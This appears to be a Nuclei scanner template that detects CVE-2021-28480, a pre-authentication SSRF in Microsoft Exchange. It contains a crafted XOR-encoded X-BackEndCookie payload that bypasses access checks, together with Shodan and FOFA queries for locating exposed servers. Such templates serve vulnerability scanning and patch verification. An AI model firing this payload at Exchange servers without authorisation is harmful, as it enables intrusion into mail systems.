id: CVE-2021-28480 info: name: Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound) author: daffainfo severity: critical description: | Microsoft Exchange Server contains a remote code execution caused by improper input validation in the server component, letting remote attackers execute arbitrary code, exploit requires network access to the server. impact: | Attackers can execute arbitrary code remotely, potentially leading to full system compromise or data breach remediation: | Apply the latest security patches and updates provided by Microsoft for Exchange Server reference: - https://sec.vnpt.vn/2021/04/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482 - https://hitcon.org/2021/agenda/279d7810-e619-4dc3-9113-b11bad5277ec/The%20Proxy%20Era%20of%20Microsoft%20Exchange%20Server.pdf - https://www.youtube.com/watch?v=vn4niT9XEIM - https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-28480 - https://nvd.nist.gov/vuln/detail/cve-2021-28480 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-28480 cwe-id: D-CWE-noinfo epss-score: 0.71425 epss-percentile: 0.99348 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft product: exchange_server shodan-query: - http.favicon.hash:1768726119 - http.title:"outlook" - cpe:"cpe:2.3:a:microsoft:exchange_server" fofa-query: - title="outlook" - icon_hash=1768726119 google-query: intitle:"outlook" tags: cve,cve2021,ssrf,rce,exchange,microsoft variables: email: '{{rand_base(5)}}@{{rand_base(5)}}.com' epoch: '{{unix_time()}}' date: '{{date_time("%Y-%M-%DT%H:%m:%s")}}' flow: | http(1) let servername = template.servername; let epoch = template.epoch; let date = template.date; let str = "Server~x]@" + servername.toLowerCase() + ":444/owa/?a.a#~" + epoch + "~" + date; let result = ""; for (let i = 0; i < str.length; i++) { let xorChar = str.charCodeAt(i) ^ 0xff; result += xorChar.toString(16).padStart(2, "0"); } set("rawXor", result); http(2) http: - raw: - | GET /owa/ HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 302' - 'contains(to_lower(header), "x-feserver")' condition: and internal: true extractors: - type: kval name: servername kval: - x_feserver internal: true - raw: - | GET /owa/calendar/{{randstr}} HTTP/1.1 Host: {{Hostname}} Cookie: X-BackEndCookie={{email}}={{base64(hex_decode(rawXor))}} X-AnchorMailbox: {{email}} matchers-condition: and matchers: - type: word part: body words: - "NT+AUTHORITY" - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" condition: and - type: status status: - 302 # digest: 490a00463044022015c78e76cdc66b9379c3c91f0482de88ca84a825cbcb7cbd142a0da3c97f8bf40220738142ba0a460f56a5783997b8777ea02ad45ad18c52b4fcf96b6933cac4c46a:922c64590222798bb761d5b6d8e72950